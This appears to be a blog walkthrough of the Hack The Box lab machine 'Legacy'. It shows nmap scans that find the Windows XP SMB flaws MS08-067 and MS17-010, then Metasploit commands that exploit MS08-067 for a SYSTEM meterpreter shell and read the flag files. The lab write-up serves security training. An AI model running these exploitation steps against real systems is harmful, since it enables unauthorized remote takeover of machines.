HTB Walkthrough - Legacy

Tony Harkness

- 4 minutes read - 723 words

Information Gathering

Scanned all TCP ports: 🕵️

# save target IP as local variable
export ip='10.10.10.4'

#initial scan
rustscan -a $ip -- -sVC -T4 -oN /tmp/$boxname_initial.nmap

# scan results
PORT    STATE SERVICE      REASON  VERSION
135/tcp open  msrpc        syn-ack Microsoft Windows RPC
139/tcp open  netbios-ssn  syn-ack Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds syn-ack Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b0:77:34 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| Statistics:
|   00 50 56 b0 77 34 00 00 00 00 00 00 00 00 00 00 00
|   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_  00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 40600/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 46409/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 50902/udp): CLEAN (Failed to receive data)
|   Check 4 (port 26949/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2026-01-04T06:05:20+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.
|_smb2-time: Protocol negotiation failed (SMB2)

Enumeration

After reviewing the results of our scan, I went ahead and added the machine to our hosts file

echo '10.10.10.4 legacy.htb'|sudo tee -a /etc/hosts

I then ran a follow-up nmap scan utilizing NSE scripts for SMB. Note: You can find a list of all the NSE scripts in /usr/share/nmap/scripts/ in Kali Linux. ‼️

nmap -Pn -p139,445 --script="smb-vuln*" legacy.htb

# results
Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)

We get CVE-2008-4250. Let’s search for this via msfconsole 👀

msf > search type:exploit cve-2008-4250

Matching Modules
================

   #   Name                                                             Disclosure Date  Rank   Check  Description
   -   ----                                                             ---------------  ----   -----  -----------
   0   exploit/windows/smb/ms08_067_netapi                              2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption
   
msf > use 0

Exploitation

Now, lets configure the module and blast away 🔥

msf exploit(windows/smb/ms08_067_netapi) > options
msf exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
msf exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
msf exploit(windows/smb/ms08_067_netapi) > options
msf exploit(windows/smb/ms08_067_netapi) > run

Now, if configured correctly you should have got a meterpreter session opened. 🤞

Now, let’s check our user 🔍

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Sweet! We already have the highest privileges we need. Now, let’s grab those flags shall we? 🧰

meterpreter > search -f user.txt
meterpreter > search -f root.txt

Simply copy the path’s returned and cat out their contents! 🪙

meterpreter > cat 'c:\Documents and Settings\john\Desktop\user.txt'
meterpreter > cat 'c:\Documents and Settings\Administrator\Desktop\root.txt'

Steps 2 Pwn

  1. Initial scan and enumeration indicated a legacy version of Windows with SMB open
  2. Utilized exploit associated with CVE-2008-4250 to get RCE as NT AUTHORITY\SYSTEM via metasploit
  3. Grabbed user and root flags

Improved skills

  • Searching for files in a meterpreter session
  • Printing the contents of files in a meterpreter session
  • Enumerating user id in a meterpreter session
  • How to use and locate NSE scripts
  • How to add do the hosts file in one line

Used tools

  • rustscan
  • nmap
  • msfconsole
    comments powered by Disqus